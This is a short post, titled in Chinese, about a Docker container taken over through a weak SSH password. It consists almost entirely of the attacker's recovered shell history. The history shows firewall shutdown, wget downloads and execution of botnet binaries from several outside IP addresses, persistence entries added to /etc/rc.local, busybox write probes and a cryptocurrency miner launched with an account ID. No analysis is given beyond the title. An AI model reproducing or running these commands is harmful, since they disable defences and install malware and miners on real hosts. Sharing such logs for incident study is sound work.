docker 容器 ssh 的弱密码被攻破了,看看黑客都干了啥

~ # cat .ash_history service iptables stop wget http://211.147.119.195:1611/Linux2.6 chmod 0755 /root/Linux2.6 nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 777 Linux2.6 ./Linux2.6 chmod 0755 /root/Linux2.6 nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 0777 Linux2.6 chmod u+x Linux2.6 ./Linux2.6 & chmod u+x Linux2.6 ./Linux2.6 & cd /tmp service iptables stop wget http://211.147.119.195:1611/Linux2.6 chmod 0755 /root/Linux2.6 nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 777 Linux2.6 ./164 chmod 0755 /root/Linux2.6 nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 0777 Linux2.6 chmod u+x Linux2.6 ./Linux2.6 & chmod u+x dos6cc4 ./Linux2.6 & cd /tmp echo "cd /root/">>/etc/rc.local echo "./Linux2.6&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local /gisdfoewrsfdf /bin/busybox cp; /gisdfoewrsfdf /bin/busybox mount ;/gisdfoewrsfdf /bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox cat /sys/fs/cgroup/.nippon; /bin/busybox rm -f /sys/fs/cgroup/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox rm -f /sys/fs/cgroup/systemd/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuset/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox rm -f /sys/fs/cgroup/perf_event/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox rm -f /sys/fs/cgroup/net_cls/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox rm -f /sys/fs/cgroup/blkio/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox cat /sys/fs/cgroup/memory/.nippon; /bin/busybox rm -f /sys/fs/cgroup/memory/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox rm -f /sys/fs/cgroup/freezer/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox cat /sys/fs/cgroup/devices/.nippon; /bin/busybox rm -f /sys/fs/cgroup/devices/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox rm -f /sys/fs/cgroup/hugetlb/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox cat /dev/mqueue/.nippon; /bin/busybox rm -f /dev/mqueue/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox cat /etc/resolv.conf/.nippon; /bin/busybox rm -f /etc/resolv.conf/.nippon /bin/busybx echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox cat /etc/hostname/.nippon; /bin/busybox rm -f /etc/hostname/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox cat /etc/hosts/.nippon; /bin/busybox rm -f /etc/hosts/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm -f /dev/shm/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox cat /var/lib/mysql/.nippon; /bin/busybox rm -f /var/lib/mysql/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox cat /proc/bus/.nippon; /bin/busybox rm -f /proc/bus/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox cat /proc/fs/.nippon; /bin/busybox rm -f /proc/fs/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox cat /proc/irq/.nippon; /bin/busybox rm -f /proc/irq/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox cat /proc/sys/.nippon; /bin/busybox rm -f /proc/sys/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox cat /proc/sysrq-trigger/.nippon; /bin/busybox rm -f /proc/sysrq-trigger/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox cat /proc/kcore/.nippon; /bin/busybox rm -f /proc/kcore/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox cat /proc/timer_list/.nippon; /bin/busybox rm -f /proc/timer_list/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox cat /proc/timer_stats/.nippon; /bin/busybox rm -f /proc/timer_stats/.nippon /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox cat /proc/sched_debug/.nippon; /bin/busybox rm -f /proc/sched_debug/.nippon /gisdfoewrsfdf /bin/busybox cat /bin/echo ;/gisdfoewrsfdf cd /tmp; /bin/busybox wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf service iptables stop wget http://211.147.112.207:1611/Linux2.4 chmod 0755 /root/Linux2.4 nohup /root/Linux2.4 > /dev/null 2>&1 & chmod 777 Linux2.4 ./Linux2.4 chmod 0755 /root/Linux2.4 nohup /root/Linux2.4 > /dev/null 2>&1 & chmod 0777 Linux2.4 chmod u+x Linux2.4 ./Linux2.4 & chmod u+x Linux2.4 ./Linux2.4 & cd /tmp service iptables stop wget http://211.147.112.207:1611/Linux2.6 chmod 0755 /root/Linux2.6 nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 777 Linux2.6 service iptables stop ./164 wget http://211.147.112.207:1611/Linux2.4 chmod 0755 /root/Linux2.6 chmod 0755 /root/Linux2.4 nohup /root/Linux2.6 > /dev/null 2>&1 & nohup /root/Linux2.4 > /dev/null 2>&1 & chmod 0777 Linux2.6 chmod 777 Linux2.4 chmod u+x Linux2.6 ./Linux2.4 ./Linux2.6 & chmod 0755 /root/Linux2.4 chmod u+x dos6cc4 nohup /root/Linux2.4 > /dev/null 2>&1 & ./Linux2.6 & chmod 0777 Linux2.4 cd /tmp chmod u+x Linux2.4 service iptables stop ./Linux2.4 & wget http://211.147.112.207:1611/dd-wrt chmod u+x Linux2.4 chmod 0755 /root/dd-wrt ./Linux2.4 & nohup /root/dd-wrt > /dev/null 2>&1 & cd /tmp chmod 777 dd-wrt service iptables stop ./dd-wrt wget http://211.147.112.207:1611/Linux2.6 chmod 0755 /root/dd-wrt chmod 0755 /root/Linux2.6 nohup /root/dd-wrt > /dev/null 2>&1 & nohup /root/Linux2.6 > /dev/null 2>&1 & chmod 0777 dd-wrt chmod 777 Linux2.6 chmod u+x dd-wrt ./164 ./dd-wrt & chmod 0755 /root/Linux2.6 chmod u+x dd-wrt nohup /root/Linux2.6 > /dev/null 2>&1 & ./dd-wrt & chmod 0777 Linux2.6 cd /tmp chmod u+x Linux2.6 service iptables stop ./Linux2.6 & wget http://211.147.112.207:1611/linux-arm chmod u+x dos6cc4 chmod 0755 /root/linux-arm ./Linux2.6 & nohup /root/linux-arm > /dev/null 2>&1 & cd /tmp chmod 777 linux-arm service iptables stop ./linux-arm wget http://211.147.112.207:1611/dd-wrt chmod 0755 /root/linux-arm nohup /root/linux-arm > /dev/null 2>&1 & chmod 0777 linux-arm chmod u+x linux-arm chmod 0755 /root/dd-wrt nohup /root/dd-wrt > /dev/null 2>&1 & chmod 777 dd-wrt ./dd-wrt ./linux-arm & chmod 0755 /root/dd-wrt chmod u+x linux-arm nohup /root/dd-wrt > /dev/null 2>&1 & ./linux-arm & chmod 0777 dd-wrt cd /tmp chmod u+x dd-wrt service iptables stop ./dd-wrt & wget http://211.147.112.207:1611/linux-mips chmod u+x dd-wrt ./dd-wrt & chmod 0755 /root/linux-mips nohup /root/linux-mips > /dev/null 2>&1 & cd /tmp chmod 777 linux-mips service iptables stop ./linux-mips wget http://211.147.112.207:1611/linux-arm chmod 0755 /root/linux-mips chmod 0755 /root/linux-arm nohup /root/linux-mips > /dev/null 2>&1 & nohup /root/linux-arm > /dev/null 2>&1 & chmod 0777 linux-mips chmod 777 linux-arm chmod u+x linux-mips ./linux-arm ./linux-mips & chmod 0755 /root/linux-arm chmod u+x linux-mips nohup /root/linux-arm > /dev/null 2>&1 & ./linux-mips & chmod 0777 linux-arm cd /tmp chmod u+x linux-arm service iptables stop ./linux-arm & wget http://211.147.112.207:1611/taskhost.exe chmod u+x linux-arm chmod 0755 /root/taskhost.exe ./linux-arm & nohup /root/taskhost.exe > /dev/null 2>&1 & cd /tmp chmod 777 taskhost.exe service iptables stop ./taskhost.exe wget http://211.147.112.207:1611/linux-mips chmod 0755 /root/taskhost.exe chmod 0755 /root/linux-mips nohup /root/taskhost.exe > /dev/null 2>&1 & nohup /root/linux-mips > /dev/null 2>&1 & chmod 0777 taskhost.exe chmod 777 linux-mips chmod u+x taskhost.exe ./linux-mips ./taskhost.exe & chmod 0755 /root/linux-mips chmod u+x taskhost.exe nohup /root/linux-mips > /dev/null 2>&1 & ./taskhost.exe & chmod 0777 linux-mips chmod u+x linux-mips cd /tmp ./linux-mips & echo "cd /root/">>/etc/rc.local chmod u+x linux-mips echo "./Linux2.4&">>/etc/rc.local ./linux-mips & echo "./Linux2.6&">>/etc/rc.local cd /tmp echo "./dd-wrt&">>/etc/rc.local service iptables stop echo "./linux-arm&">>/etc/rc.local wget http://211.147.112.207:1611/taskhost.exe echo "./linux-mips&">>/etc/rc.local chmod 0755 /root/taskhost.exe echo "./taskhost&">>/etc/rc.local nohup /root/taskhost.exe > /dev/null 2>&1 & echo "/etc/init.d/iptables stop">>/etc/rc.local chmod 777 taskhost.exe ./taskhost.exe chmod 0755 /root/taskhost.exe nohup /root/taskhost.exe > /dev/null 2>&1 & chmod 0777 taskhost.exe chmod u+x taskhost.exe ./taskhost.exe & chmod u+x taskhost.exe ./taskhost.exe & cd /tmp echo "cd /root/">>/etc/rc.local echo "./Linux2.4&">>/etc/rc.local echo "./Linux2.6&">>/etc/rc.local echo "./dd-wrt&">>/etc/rc.local echo "./linux-arm&">>/etc/rc.local echo "./linux-mips&">>/etc/rc.local echo "./taskhost&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget http://115.236.92.99:12345/bins.sh chmod 777 bins.sh ./bins.sh /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget http://115.236.92.99:12345/marlin /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop CD /tmp wget http://115.236.92.99:8846/2500 chmod 777 2500 ./2500 >/dev/null 2>&1 & /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop CD /tmp wget http://115.236.92.99:12345/2500 chmod 777 2500 ./2500 >/dev/null 2>&1 & /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget http://115.236.92.99:12345/marlin chmod 777 marlin ./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20